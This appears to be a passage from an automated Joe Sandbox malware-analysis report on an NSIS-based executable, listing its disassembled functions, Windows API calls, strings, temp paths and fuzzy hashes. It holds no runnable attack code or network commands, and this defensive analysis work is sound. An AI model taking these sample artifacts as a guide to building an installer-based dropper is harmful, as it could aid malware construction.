GetDlgItem.USER32(?,00000002), ref: 00404003
SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
SendMessageW.USER32(0000040F,00000000,?,?), ref: 0040406E
GetDlgItem.USER32(?,00000003), ref: 00404114
ShowWindow.USER32(00000000,?), ref: 00404135
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404147
EnableWindow.USER32(?,?), ref: 00404162
GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00404178
EnableMenuItem.USER32(00000000), ref: 0040417F
SendMessageW.USER32(?,000000F4,00000000,?), ref: 00404197
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
SetWindowTextW.USER32(?,00423728), ref: 004041E8
ShowWindow.USER32(?,0000000A), ref: 0040431C

Strings

(7B, xrefs: 004041C4

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: (7B
API String ID: 3282139019-3251261122
Opcode ID: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
Opcode Fuzzy Hash: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D

Function 00403AD8 Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF

lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\,75923420,00435000,00000000), ref: 00403B59
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,00435800,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403BD9
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,00435800,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
GetFileAttributesW.KERNEL32(Call), ref: 00403BF7
LoadImageW.USER32(00000067,?,00000000,00000000,00008040,00435800), ref: 00403C40

Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C

RegisterClassW.USER32(004291E0), ref: 00403C7D
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
ShowWindow.USER32(00000005,00000000), ref: 00403D00
GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
RegisterClassW.USER32(004291E0), ref: 00403D42
DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61

Strings

_Nb, xrefs: 00403C5C, 00403CC4
RichEd32, xrefs: 00403D14
Call, xrefs: 00403BA0, 00403BA9, 00403BB7, 00403C06, 00403C0C
.DEFAULT\Control Panel\International, xrefs: 00403B44
RichEdit, xrefs: 00403D33
RichEdit20W, xrefs: 00403D24, 00403D2A
RichEd20, xrefs: 00403D06
(7B, xrefs: 00403B04
Control Panel\Desktop\ResourceLocale, xrefs: 00403B0C
.exe, xrefs: 00403BE6
C:\Users\user\AppData\Local\Temp\, xrefs: 00403AE4
1033, xrefs: 00403AF8, 00403B54

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: (7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-3853389976
Opcode ID: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
Opcode Fuzzy Hash: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D

Function 00402F30 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402F44
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\WGi85dsMNp.exe,00000400), ref: 00402F60

Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\WGi85dsMNp.exe,80000000,00000003), ref: 00405EE2
Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405F04

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\WGi85dsMNp.exe,C:\Users\user\Desktop\WGi85dsMNp.exe,80000000,00000003), ref: 00402FA9
GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030F0

Strings

Inst, xrefs: 00403017
Error launching installer, xrefs: 00402F80
Null, xrefs: 00403029
soft, xrefs: 00403020
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403187
C:\Users\user\Desktop\WGi85dsMNp.exe, xrefs: 00402F4A, 00402F59, 00402F6D, 00402F8A
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139
C:\Users\user\Desktop, xrefs: 00402F8B, 00402F90, 00402F96
C:\Users\user\AppData\Local\Temp\, xrefs: 00402F3D, 00403108

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\WGi85dsMNp.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-2070875808
Opcode ID: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
Opcode Fuzzy Hash: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD

Function 0040640A Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040654B
GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 004065A8
CoTaskMemFree.OLE32(00000000), ref: 004065B3
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
lstrlenW.KERNEL32(Call,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631

Strings

Call, xrefs: 00406434, 0040650F, 00406516, 0040651A, 00406534, 00406535, 0040654A, 0040655D, 00406579, 004065A4, 004065D8, 004065DE, 004065FA, 0040660D, 0040662A, 00406630, 0040663C, 0040666F
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004065D3
Software\Microsoft\Windows\CurrentVersion, xrefs: 0040651B

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-1230650788
Opcode ID: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
Opcode Fuzzy Hash: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Iw\Unnumberable,?,?,00000031), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Iw\Unnumberable,?,?,00000031), ref: 004017D5

Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5

Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

Strings

C:\Users\user\AppData\Local\Temp\nsoC476.tmp\System.dll, xrefs: 00401835, 00401851
C:\Users\user\AppData\Local\Temp\nsoC476.tmp, xrefs: 00401821, 0040183F
C:\Users\user\AppData\Local\Iw\Unnumberable, xrefs: 0040179E
Call, xrefs: 0040178D, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Iw\Unnumberable$C:\Users\user\AppData\Local\Temp\nsoC476.tmp$C:\Users\user\AppData\Local\Temp\nsoC476.tmp\System.dll$Call
API String ID: 1941528284-110332879
Opcode ID: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
Opcode Fuzzy Hash: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E

Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026F1
SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 00402714
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040272A

Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405FD5

SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D6

Strings

9, xrefs: 00402699

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
Opcode Fuzzy Hash: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59

Function 00406752 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
wsprintfW.USER32 ref: 004067A4
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8

Strings

\, xrefs: 0040677A
UXTHEME, xrefs: 0040675B
%s%S.dll, xrefs: 0040679E

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798

Function 0040591F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
GetLastError.KERNEL32 ref: 00405976
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
GetLastError.KERNEL32 ref: 00405995

Strings

C:\Users\user\Desktop, xrefs: 0040591F

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\Desktop
API String ID: 3449924974-1246513382
Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9

Function 6F941777 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6F941B5F: GlobalFree.KERNEL32(?), ref: 6F941DB2
Part of subcall function 6F941B5F: GlobalFree.KERNEL32(?), ref: 6F941DB7
Part of subcall function 6F941B5F: GlobalFree.KERNEL32(?), ref: 6F941DBC

GlobalFree.KERNEL32(00000000), ref: 6F941825
FreeLibrary.KERNEL32(?), ref: 6F9418AB
GlobalFree.KERNEL32(00000000), ref: 6F9418D0

Part of subcall function 6F942352: GlobalAlloc.KERNEL32(00000040,?), ref: 6F942383

Part of subcall function 6F942724: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6F9417F6,00000000), ref: 6F9427F4

Part of subcall function 6F9415C6: wsprintfW.USER32 ref: 6F9415F4

Strings

, xrefs: 6F9418B1

Memory Dump Source

Source File: 00000000.00000002.2212754583.000000006F941000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F940000, based on PE: true

Associated: 00000000.00000002.2212735857.000000006F940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2212770534.000000006F944000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2212826501.000000006F946000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f940000_WGi85dsMNp.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: e480836ac1d044e065c230c88fd373b086140ba351c1e4e50c7ac59fb85899b7
Instruction ID: 66fb19808cfbfe50dc4458b58fc53588b5f5594bf8891aed65163e2733e2b8fe
Opcode Fuzzy Hash: e480836ac1d044e065c230c88fd373b086140ba351c1e4e50c7ac59fb85899b7
Instruction Fuzzy Hash: D741AE714003049ADB1A9F749884BD637ACBF37328F144166E9299A2D7DB78E0E8CB60

Function 00402032 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 0040205D

Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 0040206E
FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,?,000000F0), ref: 004020EB

Strings

!s, xrefs: 004020B0

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID: !s
API String ID: 334405425-2711790073
Opcode ID: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
Instruction ID: 38390b8595ebf5dc4f6cf14c4d4b7ed92d06cc21542818b97b262269bef072d5
Opcode Fuzzy Hash: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
Instruction Fuzzy Hash: DC218331D00215BACF20AFA5CE4D99E7A70BF04358F60413BF511B51E0DBBD8991DA6E

Function 004023E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsoC476.tmp,00000023,00000011,00000002), ref: 0040242F
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsoC476.tmp,00000000,00000011,00000002), ref: 0040246F
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsoC476.tmp,00000000,00000011,00000002), ref: 00402557

Strings

C:\Users\user\AppData\Local\Temp\nsoC476.tmp, xrefs: 00402420, 0040242E, 00402445, 00402459, 00402464

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsoC476.tmp
API String ID: 2655323295-1119368686
Opcode ID: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
Instruction ID: 2320c74fc41ffeb716861e397aa06506e2c1d49fdd3331f7b5a779c93e7e4390
Opcode Fuzzy Hash: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
Instruction Fuzzy Hash: C4118471E00104BEEB10AFA5DE89EAEBB74EB44754F11803BF504B71D1DBB89D419B68

Function 00405F0D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405F2B
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00435000,004034A3,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004036EF), ref: 00405F46

Strings

nsa, xrefs: 00405F1A
C:\Users\user\AppData\Local\Temp\, xrefs: 00405F12, 00405F16

Memory Dump Source

